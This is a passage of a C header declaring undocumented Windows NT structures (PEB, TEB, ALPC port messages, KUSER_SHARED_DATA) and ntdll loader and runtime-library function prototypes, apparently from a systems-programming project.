ReadImageFileExecOptions;\n\tBOOLEAN BeingDebugged;\n\tunion\n\t{\n\t\tBOOLEAN BitField;\n\t\tstruct\n\t\t{\n\t\t\tBOOLEAN ImageUsesLargePages : 1;\n\t\t\tBOOLEAN IsProtectedProcess : 1;\n\t\t\tBOOLEAN IsLegacyProcess : 1;\n\t\t\tBOOLEAN IsImageDynamicallyRelocated : 1;\n\t\t\tBOOLEAN SkipPatchingUser32Forwarders : 1;\n\t\t\tBOOLEAN SpareBits : 3;\n\t\t};\n\t};\n\tHANDLE Mutant;\n\n\tPVOID ImageBaseAddress;\n\tPPEB_LDR_DATA Ldr;\n\tPRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n\tPVOID SubSystemData;\n\tPVOID ProcessHeap;\n\tPRTL_CRITICAL_SECTION FastPebLock;\n\tPVOID AtlThunkSListPtr;\n\tPVOID IFEOKey;\n\tunion\n\t{\n\t\tULONG CrossProcessFlags;\n\t\tstruct\n\t\t{\n\t\t\tULONG ProcessInJob : 1;\n\t\t\tULONG ProcessInitializing : 1;\n\t\t\tULONG ProcessUsingVEH : 1;\n\t\t\tULONG ProcessUsingVCH : 1;\n\t\t\tULONG ProcessUsingFTH : 1;\n\t\t\tULONG ReservedBits0 : 27;\n\t\t};\n\t\tULONG EnvironmentUpdateCount;\n\t};\n\tunion\n\t{\n\t\tPVOID KernelCallbackTable;\n\t\tPVOID UserSharedInfoPtr;\n\t};\n\tULONG SystemReserved[1];\n\tULONG AtlThunkSListPtr32;\n\tPVOID ApiSetMap;\n\tULONG TlsExpansionCounter;\n\tPVOID TlsBitmap;\n\tULONG TlsBitmapBits[2];\n\tPVOID ReadOnlySharedMemoryBase;\n\tPVOID HotpatchInformation;\n\tPVOID *ReadOnlyStaticServerData;\n\tPVOID AnsiCodePageData;\n\tPVOID OemCodePageData;\n\tPVOID UnicodeCaseTableData;\n\n\tULONG NumberOfProcessors;\n\tULONG NtGlobalFlag;\n\n\tLARGE_INTEGER CriticalSectionTimeout;\n\tSIZE_T HeapSegmentReserve;\n\tSIZE_T HeapSegmentCommit;\n\tSIZE_T HeapDeCommitTotalFreeThreshold;\n\tSIZE_T HeapDeCommitFreeBlockThreshold;\n\n\tULONG NumberOfHeaps;\n\tULONG MaximumNumberOfHeaps;\n\tPVOID *ProcessHeaps;\n\n\tPVOID GdiSharedHandleTable;\n\tPVOID ProcessStarterHelper;\n\tULONG GdiDCAttributeList;\n\n\tPRTL_CRITICAL_SECTION LoaderLock;\n\n\tULONG OSMajorVersion;\n\tULONG OSMinorVersion;\n\tUSHORT OSBuildNumber;\n\tUSHORT OSCSDVersion;\n\tULONG OSPlatformId;\n\tULONG ImageSubsystem;\n\tULONG ImageSubsystemMajorVersion;\n\tULONG 
ImageSubsystemMinorVersion;\n\tULONG_PTR ImageProcessAffinityMask;\n\tGDI_HANDLE_BUFFER GdiHandleBuffer;\n\tPVOID PostProcessInitRoutine;\n\n\tPVOID TlsExpansionBitmap;\n\tULONG TlsExpansionBitmapBits[32];\n\n\tULONG SessionId;\n\n\tULARGE_INTEGER AppCompatFlags;\n\tULARGE_INTEGER AppCompatFlagsUser;\n\tPVOID pShimData;\n\tPVOID AppCompatInfo;\n\n\tUNICODE_STRING CSDVersion;\n\n\tPVOID ActivationContextData;\n\tPVOID ProcessAssemblyStorageMap;\n\tPVOID SystemDefaultActivationContextData;\n\tPVOID SystemAssemblyStorageMap;\n\n\tSIZE_T MinimumStackCommit;\n\n\tPVOID *FlsCallback;\n\tLIST_ENTRY FlsListHead;\n\tPVOID FlsBitmap;\n\tULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];\n\tULONG FlsHighIndex;\n\n\tPVOID WerRegistrationData;\n\tPVOID WerShipAssertPtr;\n\tPVOID pContextData;\n\tPVOID pImageHeaderHash;\n\tunion\n\t{\n\t\tULONG TracingFlags;\n\t\tstruct\n\t\t{\n\t\t\tULONG HeapTracingEnabled : 1;\n\t\t\tULONG CritSecTracingEnabled : 1;\n\t\t\tULONG SpareTracingBits : 30;\n\t\t};\n\t};\n} PEB, *PPEB;\n\ntypedef struct _TEB_ACTIVE_FRAME_CONTEXT\n{\n\tULONG Flags;\n\tPSTR FrameName;\n} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;\n\ntypedef struct _TEB_ACTIVE_FRAME\n{\n\tULONG Flags;\n\tstruct _TEB_ACTIVE_FRAME *Previous;\n\tPTEB_ACTIVE_FRAME_CONTEXT Context;\n} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;\n\n#define GDI_BATCH_BUFFER_SIZE 310\n\ntypedef struct _GDI_TEB_BATCH {\n\tULONG\tOffset;\n\tUCHAR\tAlignment[4];\n\tULONG_PTR HDC;\n\tULONG\tBuffer[GDI_BATCH_BUFFER_SIZE];\n} GDI_TEB_BATCH, *PGDI_TEB_BATCH;\n\ntypedef struct _TEB\n{\n\tNT_TIB NtTib;\n\n\tPVOID EnvironmentPointer;\n\tCLIENT_ID ClientId;\n\tPVOID ActiveRpcHandle;\n\tPVOID ThreadLocalStoragePointer;\n\tPPEB ProcessEnvironmentBlock;\n\n\tULONG LastErrorValue;\n\tULONG CountOfOwnedCriticalSections;\n\tPVOID CsrClientThread;\n\tPVOID Win32ThreadInfo;\n\tULONG User32Reserved[26];\n\tULONG UserReserved[5];\n\tPVOID WOW32Reserved;\n\tLCID CurrentLocale;\n\tULONG 
FpSoftwareStatusRegister;\n\tPVOID SystemReserved1[54];\n\tNTSTATUS ExceptionCode;\n\tPVOID ActivationContextStackPointer;\n#if defined(_M_X64)\n\tUCHAR SpareBytes[24];\n#else\n\tUCHAR SpareBytes[36];\n#endif\n\tULONG TxFsContext;\n\n\tGDI_TEB_BATCH GdiTebBatch;\n\tCLIENT_ID RealClientId;\n\tHANDLE GdiCachedProcessHandle;\n\tULONG GdiClientPID;\n\tULONG GdiClientTID;\n\tPVOID GdiThreadLocalInfo;\n\tULONG_PTR Win32ClientInfo[62];\n\tPVOID glDispatchTable[233];\n\tULONG_PTR glReserved1[29];\n\tPVOID glReserved2;\n\tPVOID glSectionInfo;\n\tPVOID glSection;\n\tPVOID glTable;\n\tPVOID glCurrentRC;\n\tPVOID glContext;\n\n\tNTSTATUS LastStatusValue;\n\tUNICODE_STRING StaticUnicodeString;\n\tWCHAR StaticUnicodeBuffer[261];\n\n\tPVOID DeallocationStack;\n\tPVOID TlsSlots[64];\n\tLIST_ENTRY TlsLinks;\n\n\tPVOID Vdm;\n\tPVOID ReservedForNtRpc;\n\tPVOID DbgSsReserved[2];\n\n\tULONG HardErrorMode;\n#if defined(_M_X64)\n\tPVOID Instrumentation[11];\n#else\n\tPVOID Instrumentation[9];\n#endif\n\tGUID ActivityId;\n\n\tPVOID SubProcessTag;\n\tPVOID EtwLocalData;\n\tPVOID EtwTraceData;\n\tPVOID WinSockData;\n\tULONG GdiBatchCount;\n\n\tunion\n\t{\n\t\tPROCESSOR_NUMBER CurrentIdealProcessor;\n\t\tULONG IdealProcessorValue;\n\t\tstruct\n\t\t{\n\t\t\tUCHAR ReservedPad0;\n\t\t\tUCHAR ReservedPad1;\n\t\t\tUCHAR ReservedPad2;\n\t\t\tUCHAR IdealProcessor;\n\t\t};\n\t};\n\n\tULONG GuaranteedStackBytes;\n\tPVOID ReservedForPerf;\n\tPVOID ReservedForOle;\n\tULONG WaitingOnLoaderLock;\n\tPVOID SavedPriorityState;\n\tULONG_PTR SoftPatchPtr1;\n\tPVOID ThreadPoolData;\n\tPVOID *TlsExpansionSlots;\n#if defined(_M_X64)\n\tPVOID DeallocationBStore;\n\tPVOID BStoreLimit;\n#endif\n\tULONG MuiGeneration;\n\tULONG IsImpersonating;\n\tPVOID NlsCache;\n\tPVOID pShimData;\n\tULONG HeapVirtualAffinity;\n\tHANDLE CurrentTransactionHandle;\n\tPTEB_ACTIVE_FRAME ActiveFrame;\n\tPVOID FlsData;\n\n\tPVOID PreferredLanguages;\n\tPVOID UserPrefLanguages;\n\tPVOID MergedPrefLanguages;\n\tULONG 
MuiImpersonation;\n\n\tunion\n\t{\n\t\tUSHORT CrossTebFlags;\n\t\tUSHORT SpareCrossTebBits : 16;\n\t};\n\tunion\n\t{\n\t\tUSHORT SameTebFlags;\n\t\tstruct\n\t\t{\n\t\t\tUSHORT SafeThunkCall : 1;\n\t\t\tUSHORT InDebugPrint : 1;\n\t\t\tUSHORT HasFiberData : 1;\n\t\t\tUSHORT SkipThreadAttach : 1;\n\t\t\tUSHORT WerInShipAssertCode : 1;\n\t\t\tUSHORT RanProcessInit : 1;\n\t\t\tUSHORT ClonedThread : 1;\n\t\t\tUSHORT SuppressDebugMsg : 1;\n\t\t\tUSHORT DisableUserStackWalk : 1;\n\t\t\tUSHORT RtlExceptionAttached : 1;\n\t\t\tUSHORT InitialThread : 1;\n\t\t\tUSHORT SpareSameTebBits : 1;\n\t\t};\n\t};\n\n\tPVOID TxnScopeEnterCallback;\n\tPVOID TxnScopeExitCallback;\n\tPVOID TxnScopeContext;\n\tULONG LockCount;\n\tULONG SpareUlong0;\n\tPVOID ResourceRetValue;\n} TEB, *PTEB;\n\n__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }\n\n/*\n** PEB/TEB END\n*/\n\n/*\n** ALPC START\n*/\n\ntypedef struct _PORT_MESSAGE {\n\tunion {\n\t\tstruct {\n\t\t\tCSHORT DataLength;\n\t\t\tCSHORT TotalLength;\n\t\t} s1;\n\t\tULONG Length;\n\t} u1;\n\tunion {\n\t\tstruct {\n\t\t\tCSHORT Type;\n\t\t\tCSHORT DataInfoOffset;\n\t\t} s2;\n\t\tULONG ZeroInit;\n\t} u2;\n\tunion {\n\t\tCLIENT_ID ClientId;\n\t\tdouble DoNotUseThisField;       // Force quadword alignment\n\t} u3;\n\tULONG MessageId;\n\tunion {\n\t\tULONG ClientViewSize;               // Only valid on LPC_CONNECTION_REQUEST message\n\t\tULONG CallbackId;                   // Only valid on LPC_REQUEST message\n\t} u4;\n\tUCHAR Reserved[8];\n} PORT_MESSAGE, *PPORT_MESSAGE;\n\n// end_ntsrv\n\ntypedef struct _PORT_DATA_ENTRY {\n\tPVOID Base;\n\tULONG Size;\n} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;\n\ntypedef struct _PORT_DATA_INFORMATION {\n\tULONG CountDataEntries;\n\tPORT_DATA_ENTRY DataEntries[1];\n} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;\n\n#define LPC_REQUEST             1\n#define LPC_REPLY               2\n#define LPC_DATAGRAM            3\n#define LPC_LOST_REPLY          4\n#define 
LPC_PORT_CLOSED         5\n#define LPC_CLIENT_DIED         6\n#define LPC_EXCEPTION           7\n#define LPC_DEBUG_EVENT         8\n#define LPC_ERROR_EVENT         9\n#define LPC_CONNECTION_REQUEST 10\n\n#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)\n#define PORT_MAXIMUM_MESSAGE_LENGTH 256\n\ntypedef struct _LPC_CLIENT_DIED_MSG {\n\tPORT_MESSAGE PortMsg;\n\tLARGE_INTEGER CreateTime;\n} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;\n\ntypedef struct _PORT_VIEW {\n\tULONG Length;\n\tHANDLE SectionHandle;\n\tULONG SectionOffset;\n\tULONG ViewSize;\n\tPVOID ViewBase;\n\tPVOID ViewRemoteBase;\n} PORT_VIEW, *PPORT_VIEW;\n\ntypedef struct _REMOTE_PORT_VIEW {\n\tULONG Length;\n\tULONG ViewSize;\n\tPVOID ViewBase;\n} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;\n\n/*\n** ALPC END\n*/\n\n/*\n** KUSER_SHARED_DATA START\n*/\n\ntypedef struct _KSYSTEM_TIME {\n\tULONG LowPart;\n\tLONG High1Time;\n\tLONG High2Time;\n} KSYSTEM_TIME, *PKSYSTEM_TIME;\n\ntypedef enum _NT_PRODUCT_TYPE {\n\tNtProductWinNt = 1,\n\tNtProductLanManNt,\n\tNtProductServer\n} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;\n\n#define PROCESSOR_FEATURE_MAX 64\n\ntypedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {\n\tStandardDesign,                 // None == 0 == standard design\n\tNEC98x86,                       // NEC PC98xx series on X86\n\tEndAlternatives                 // past end of known alternatives\n} ALTERNATIVE_ARCHITECTURE_TYPE;\n\n//\n// Define Address of User Shared Data\n//\n#define MM_SHARED_USER_DATA_VA      0x000000007FFE0000\n\n//\n// WARNING: this definition is compatibility only.\n// Structure is incomplete. 
Only important fields.\n//\ntypedef struct _KUSER_SHARED_DATA_COMPAT {\n\tULONG TickCountLowDeprecated;\n\tULONG TickCountMultiplier;\n\tvolatile KSYSTEM_TIME InterruptTime;\n\tvolatile KSYSTEM_TIME SystemTime;\n\tvolatile KSYSTEM_TIME TimeZoneBias;\n\tUSHORT ImageNumberLow;\n\tUSHORT ImageNumberHigh;\n\tWCHAR NtSystemRoot[260];\n\tULONG MaxStackTraceDepth;\n\tULONG CryptoExponent;\n\tULONG TimeZoneId;\n\tULONG LargePageMinimum;\n\n\tunion {\n\t\tULONG Reserved2[7];\n\t\tstruct {\n\t\t\tULONG AitSamplingValue;\n\t\t\tULONG AppCompatFlag;\n\t\t\tstruct {\n\t\t\t\tULONG LowPart;\n\t\t\t\tULONG HighPart;\n\t\t\t} RNGSeedVersion;\n\t\t\tULONG GlobalValidationRunlevel;\n\t\t\tULONG TimeZoneBiasStamp;\n\t\t\tULONG ReservedField;\n\t\t};\n\t};\n\t\n\tNT_PRODUCT_TYPE NtProductType;\n\tBOOLEAN ProductTypeIsValid;\n\tULONG NtMajorVersion;\n\tULONG NtMinorVersion;\n\tBOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];\n\tULONG Reserved1;\n\tULONG Reserved3;\n\tvolatile ULONG TimeSlip;\n\tALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;\n\tULONG AltArchitecturePad;\n\tLARGE_INTEGER SystemExpirationDate;\n\tULONG SuiteMask;\n\tBOOLEAN KdDebuggerEnabled;\n\n\tunion {\n\t\tUCHAR MitigationPolicies;\n\t\tstruct {\n\t\t\tUCHAR NXSupportPolicy : 2;\n\t\t\tUCHAR SEHValidationPolicy : 2;\n\t\t\tUCHAR CurDirDevicesSkippedForDlls : 2;\n\t\t\tUCHAR Reserved : 2;\n\t\t\tUCHAR Reserved6[2];\n\t\t};\n\t};\n\n\tvolatile ULONG ActiveConsoleId;\n\tvolatile ULONG DismountCount;\n\tULONG ComPlusPackage;\n\tULONG LastSystemRITEventTickCount;\n\tULONG NumberOfPhysicalPages;\n\tBOOLEAN SafeBootMode;\n\tUCHAR Reserved12[3];\n\n\tunion {\n\t\tULONG SharedDataFlags;\n\t\tstruct {\n\t\t\tULONG DbgErrorPortPresent : 1;\n\t\t\tULONG DbgElevationEnabled : 1;\n\t\t\tULONG DbgVirtEnabled : 1;\n\t\t\tULONG DbgInstallerDetectEnabled: 1;\n\t\t\tULONG DbgLkgEnabled : 1;\n\t\t\tULONG DbgDynProcessorEnabled : 1;\n\t\t\tULONG DbgConsoleBrokerEnabled : 1;\n\t\t\tULONG DbgSecureBootEnabled : 1;\n\t\t\tULONG 
DbgMultiSessionSku : 1;\n\t\t\tULONG SpareBits : 23;\n\t\t};\n\t};\n\n\t//incomplete\n\n} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;\n\n#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)\n\n/*\n** KUSER_SHARED_DATA END\n*/\n\n/*\n**  LDR START\n*/\n\ntypedef\nVOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(\n\t_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n\t_In_ PVOID Context,\n\t_In_ OUT BOOLEAN *StopEnumeration\n\t);\n\nNTSTATUS NTAPI LdrEnumerateLoadedModules(\n\t_In_opt_ ULONG Flags,\n\t_In_     PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,\n\t_In_opt_ PVOID Context\n\t);\n\nNTSTATUS NTAPI LdrGetProcedureAddress(\n\t_In_     PVOID DllHandle,\n\t_In_opt_ CONST ANSI_STRING* ProcedureName,\n\t_In_opt_ ULONG ProcedureNumber,\n\t_Out_    PVOID *ProcedureAddress\n\t);\n\nNTSTATUS NTAPI LdrLoadDll(\n\t_In_opt_ PCWSTR DllPath,\n\t_In_opt_ PULONG DllCharacteristics,\n\t_In_     PCUNICODE_STRING DllName,\n\t_Out_    PVOID *DllHandle\n\t);\n\nNTSTATUS NTAPI LdrUnloadDll(\n\t_In_ PVOID DllHandle\n\t);\n\nNTSTATUS NTAPI LdrGetDllHandle(\n\t_In_opt_ PCWSTR DllPath OPTIONAL,\n\t_In_opt_ PULONG DllCharacteristics OPTIONAL,\n\t_In_ PCUNICODE_STRING DllName,\n\t_Out_ PVOID *DllHandle\n\t);\n\nNTSTATUS NTAPI LdrFindResource_U(\n\t_In_ PVOID DllHandle,\n\t_In_ CONST ULONG_PTR* ResourceIdPath,\n\t_In_ ULONG ResourceIdPathLength,\n\t_Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry\n\t);\n\nNTSTATUS NTAPI LdrAccessResource(\n\t_In_ PVOID DllHandle,\n\t_In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,\n\t_Out_opt_ PVOID *Address,\n\t_Out_opt_ PULONG Size\n\t);\n\nNTSTATUS NTAPI LdrFindEntryForAddress(\n\t_In_ PVOID Address,\n\t_Out_ PLDR_DATA_TABLE_ENTRY *TableEntry\n\t);\n\n/*\n**  LDR END\n*/\n\n/*\n** Csr Runtime START\n*/\n\nULONG NTAPI CsrGetProcessId(\n\t);\n\n/*\n** Csr Runtime END\n*/\n\n/*\n** Runtime Library API START\n*/\n\nULONG NTAPI RtlRandomEx(\n\t_Inout_ PULONG Seed\n\t);\n\nPVOID NTAPI 
RtlAddVectoredExceptionHandler(\n\t_In_ ULONG First,\n\t_In_ PVECTORED_EXCEPTION_HANDLER Handler\n\t);\n\nULONG NTAPI RtlRemoveVectoredExceptionHandler(\n\t_In_ PVOID Handle\n\t);\n\nVOID NTAPI RtlPushFrame(\n\t_In_ PTEB_ACTIVE_FRAME Frame\n\t);\n\nVOID NTAPI RtlPopFrame(\n\t_In_ PTEB_ACTIVE_FRAME Frame\n\t);\n\nPTEB_ACTIVE_FRAME NTAPI RtlGetFrame(\n\tVOID\n\t);\n\nVOID NTAPI RtlInitUnicodeString(\n\t_Inout_\tPUNICODE_STRING DestinationString,\n\t_In_\tPCWSTR SourceString\n\t);\n\nBOOLEAN NTAPI RtlEqualUnicodeString(\n\t_In_ PCUNICODE_STRING String1,\n\t_In_ PCUNICODE_STRING String2,\n\t_In_ BOOLEAN CaseInSensitive\n\t);\n\nBOOLEAN NTAPI RtlPrefixUnicodeString(\n\t_In_ PCUNICODE_STRING String1,\n\t_In_ PCUNICODE_STRING String2,\n\t_In_ BOOLEAN CaseInSensitive\n\t);\n\nNTSTATUS NTAPI RtlGetVersion(\n\t_Inout_\tPRTL_OSVERSIONINFOW lpVersionInformation\n\t);\n\nULONG NTAPI RtlNtStatusToDosError(\n\t_In_ NTSTATUS Status\n\t);\n\nNTSTATUS NTAPI RtlGetOwnerSecurityDescriptor(\n\t_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PSID *Owner,\n\t_Out_ PBOOLEAN OwnerDefaulted\n\t);\n\nNTSTATUS NTAPI RtlGetGroupSecurityDescriptor(\n\t_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PSID *Group,\n\t_Out_ PBOOLEAN GroupDefaulted\n\t);\n\nNTSTATUS NTAPI RtlGetDaclSecurityDescriptor(\n\t_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PBOOLEAN DaclPresent,\n\t_Out_ PACL *Dacl,\n\t_Out_ PBOOLEAN DaclDefaulted\n\t);\n\nNTSTATUS NTAPI RtlGetSaclSecurityDescriptor(\n\t_In_  PSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_Out_ PBOOLEAN SaclPresent,\n\t_Out_ PACL *Sacl,\n\t_Out_ PBOOLEAN SaclDefaulted\n\t);\n\nULONG NTAPI RtlLengthSecurityDescriptor(\n\t_In_ PSECURITY_DESCRIPTOR SecurityDescriptor\n\t);\n\nVOID NTAPI RtlMapGenericMask(\n\t_In_ PACCESS_MASK AccessMask,\n\t_In_ PGENERIC_MAPPING GenericMapping\n\t);\n\nVOID NTAPI RtlInitString(\n\tPSTRING DestinationString,\n\tPCSZ SourceString\n\t);\n\nNTSTATUS NTAPI RtlExpandEnvironmentStrings_U(\n\t_In_opt_\tPVOID 
Environment,\n\t_In_\t\tPCUNICODE_STRING Source,\n\t_Out_\t\tPUNICODE_STRING Destination,\n\t_Out_opt_\tPULONG ReturnedLength\n\t);\n\nVOID NTAPI RtlSetLastWin32Error(\n\tLONG Win32Error\n\t);\n\nPVOID NTAPI RtlAllocateHeap(\n\t_In_ PVOID HeapHandle,\n\t_In_ ULONG Flags,\n\t_In_ SIZE_T Size\n\t);\n\nBOOLEAN NTAPI RtlFreeHeap(\n\t_In_ PVOID HeapHandle,\n\t_In_ ULONG Flags,\n\t_In_ PVOID BaseAddress\n\t);\n\nBOOLEAN NTAPI RtlValidSid(\n\tPSID Sid\n\t);\n\nBOOLEAN NTAPI RtlEqualSid(\n\tPSID Sid1,\n\tPSID Sid2\n\t);\n\nBOOLEAN NTAPI RtlEqualPrefixSid(\n\tPSID Sid1,\n\tPSID Sid2\n\t);\n\nULONG NTAPI RtlLengthRequiredSid(\n\tULONG SubAuthorityCount\n\t);\n\nPVOID NTAPI RtlFreeSid(\n\tIN PSID Sid\n\t);\n\nNTSTATUS NTAPI RtlAllocateAndInitializeSid(\n\tIN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority,\n\tIN UCHAR SubAuthorityCount,\n\tIN ULONG SubAuthority0,\n\tIN ULONG SubAuthority1,\n\tIN ULONG SubAuthority2,\n\tIN ULONG SubAuthority3,\n\tIN ULONG SubAuthority4,\n\tIN ULONG SubAuthority5,\n\tIN ULONG SubAuthority6,\n\tIN ULONG SubAuthority7,\n\tOUT PSID *Sid\n\t);\n                                          \nNTSTATUS NTAPI RtlInitializeSid(                                  \n\tPSID Sid,                                      \n\tPSID_IDENTIFIER_AUTHORITY IdentifierAuthority,  \n\tUCHAR SubAuthorityCount                         \n\t);                                              \n\nPSID_IDENTIFIER_AUTHORITY NTAPI RtlIdentifierAuthoritySid(\n\tPSID Sid\n\t);\n\nPULONG NTAPI RtlSubAuthoritySid(                               \n\tPSID Sid,                                       \n\tULONG SubAuthority                              \n\t);                                              \n\nPUCHAR NTAPI RtlSubAuthorityCountSid(\n\tPSID Sid\n\t);\n\nULONG NTAPI RtlLengthSid(\n\tPSID Sid\n\t);\n\nNTSTATUS NTAPI RtlCopySid(\n\tULONG DestinationSidLength,\n\tPSID DestinationSid,\n\tPSID SourceSid\n\t);\n\nNTSTATUS NTAPI RtlCopySidAndAttributesArray(\n\tULONG 
ArrayLength,\n\tPSID_AND_ATTRIBUTES Source,\n\tULONG TargetSidBufferSize,\n\tPSID_AND_ATTRIBUTES TargetArrayElement,\n\tPSID TargetSid,\n\tPSID *NextTargetSid,\n\tPULONG RemainingTargetSidSize\n\t);\n\nNTSTATUS NTAPI RtlLengthSidAsUnicodeString(\n\tPSID Sid,\n\tPULONG StringLength\n\t);\n\nNTSTATUS NTAPI RtlConvertSidToUnicodeString(\n\tPUNICODE_STRING UnicodeString,\n\tPSID Sid,\n\tBOOLEAN AllocateDestinationString\n\t);\n\nNTSTATUS NTAPI RtlCreateSecurityDescriptor(\n\tPSECURITY_DESCRIPTOR SecurityDescriptor,\n\tULONG Revision\n\t);\n\nNTSTATUS NTAPI RtlSetOwnerSecurityDescriptor( \n\tPSECURITY_DESCRIPTOR SecurityDescriptor,   \n\tPSID Owner,                                \n\tBOOLEAN OwnerDefaulted                     \n\t);\n\nFORCEINLINE LUID\nNTAPI\nRtlConvertLongToLuid(\n\tLONG Long\n\t)\n{\n\tLUID TempLuid;\n\tLARGE_INTEGER TempLi;\n\n\tTempLi.QuadPart = Long;\n\tTempLuid.LowPart = TempLi.LowPart;\n\tTempLuid.HighPart = TempLi.HighPart;\n\treturn(TempLuid);\n}\n\nNTSTATUS NTAPI RtlFormatCurrentUserKeyPath(\n\t_Out_ PUNICODE_STRING CurrentUserKeyPath\n\t);\n\nVOID NTAPI RtlFreeUnicodeString(\n\tPUNICODE_STRING UnicodeString\n\t);\n\nVOID NTAPI RtlFreeAnsiString(\n\tPANSI_STRING AnsiString\n\t);\n\nNTSTATUS NTAPI RtlAnsiStringToUnicodeString(\n\tPUNICODE_STRING DestinationString,\n\tPCANSI_STRING SourceString,\n\tBOOLEAN AllocateDestinationString\n\t);\n\nBOOLEAN NTAPI RtlDosPathNameToNtPathName_U(\n\t_In_ PCWSTR DosFileName,\n\t_Out_ PUNICODE_STRING NtFileName,\n\t_Out_opt_ PWSTR *FilePart,\n\tPVOID Reserved\n\t);\n\nNTSTATUS NTAPI RtlGetCompressionWorkSpaceSize(\n\t_In_ USHORT CompressionFormatAndEngine,\n\t_Out_ PULONG CompressBufferWorkSpaceSize,\n\t_Out_ PULONG CompressFragmentWorkSpaceSize\n\t);\n\nNTSTATUS NTAPI RtlCompressBuffer(\n\t_In_ USHORT CompressionFormatAndEngine,\n\t_In_ PUCHAR UncompressedBuffer,\n\t_In_ ULONG UncompressedBufferSize,\n\t_Out_ PUCHAR CompressedBuffer,\n\t_In_ ULONG CompressedBufferSize,\n\t_In_ ULONG 
UncompressedChunkSize,\n\t_Out_ PULONG FinalCompressedSize,\n\t_In_ PVOID WorkSpace\n\t);\n\nNTSTATUS NTAPI RtlDecompressBuffer(\n\t_In_ USHORT CompressionFormat,\n\t_Out_ PUCHAR UncompressedBuffer,\n\t_In_ ULONG UncompressedBufferSize,\n\t_In_ PUCHAR CompressedBuffer,\n\t_In_ ULONG CompressedBufferSize,\n\t_Out_ PULONG FinalUncompressedSize\n\t);\n\nPIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(\n\t_In_ PVOID Base\n\t);\n\nNTSYSAPI PVOID NTAPI RtlAddressInSectionTable(\n\t_In_ PIMAGE_NT_HEADERS NtHeaders,\n\t_In_ PVOID BaseOfImage,\n\t_In_ ULONG VirtualAddress\n\t);\n\nPVOID NTAPI RtlImageDirectoryEntryToData(\n\tPVOID BaseOfImage,\n\tBOOLEAN MappedAsImage,\n\tUSHORT DirectoryEntry,\n\tPULONG Size\n\t);\n\nVOID NTAPI RtlSecondsSince1970ToTime(\n\tULONG ElapsedSeconds,\n\tPLARGE_INTEGER Time\n\t);\n\nVOID NTAPI RtlSecondsSince1980ToTime(\n\tULONG ElapsedSeconds,\n\tPLARGE_INTEGER Time\n\t);\n\nBOOLEAN NTAPI RtlTimeToSecondsSince1980(\n\tPLARGE_INTEGER Time,\n\tPULONG ElapsedSeconds\n\t);\n\nVOID NTAPI RtlTimeToTimeFields(\n\t_Inout_ PLARGE_INTEGER Time,\n\t_Inout_ PTIME_FIELDS TimeFields\n\t);\n\nBOOLEAN NTAPI RtlTimeFieldsToTime(\n\tPTIME_FIELDS TimeFields,\n\tPLARGE_INTEGER Time\n\t);\n\nULONG32 NTAPI RtlComputeCrc32(\n\t_In_ ULONG32 PartialCrc,\n\t_In_ PVOID Buffer,\n\t_In_ ULONG Length\n\t);\n\nVOID NTAPI RtlGetNtVersionNumbers(\n\t_Out_opt_  PULONG MajorVersion,\n\t_Out_opt_  PULONG MinorVersion,\n\t_Out_opt_  PULONG BuildNumber\n\t);\n\nPPEB NTAPI RtlGetCurrentPeb(\n\tVOID\n\t);\n\nPWSTR NTAPI RtlIpv4AddressToStringW(\n\t__in const struct in_addr *Addr,\n\t__out_ecount(16) PWSTR S\n\t);\n\nNTSTATUS NTAPI RtlAdjustPrivilege(\n\tULONG Privilege,\n\tBOOLEAN Enable,\n\tBOOLEAN Client,\n\tPBOOLEAN WasEnabled\n\t);\n\nULONG DbgPrint(\n\t_In_ PCH Format,\n\t...\n\t);\n\n/*\n** Runtime Library API END\n*/\n\n/*\n** Generic AVL API START\n*/\ntypedef ULONG CLONG;\n\ntypedef enum _TABLE_SEARCH_RESULT 
{\n\tTableEmptyTree,\n\tTableFoundNode,\n\tTableInsertAsLeft,\n\tTableInsertAsRight\n} TABLE_SEARCH_RESULT;\n\ntypedef enum _RTL_GENERIC_COMPARE_RESULTS {\n\tGenericLessThan,\n\tGenericGreaterThan,\n\tGenericEqual\n} RTL_GENERIC_COMPARE_RESULTS;\n\ntypedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;\ntypedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;\n\ntypedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(\n\t_In_  _RTL_AVL_TABLE *Table,\n\t_In_ PVOID FirstStruct,\n\t_In_ PVOID SecondStruct\n\t);\n\ntypedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(\n\t_In_ _RTL_AVL_TABLE *Table,\n\t_In_ ULONG ByteSize\n\t);\n\ntypedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(\n\t_In_  _RTL_AVL_TABLE *Table,\n\t_In_ _Post_invalid_ PVOID Buffer\n\t);\n\ntypedef 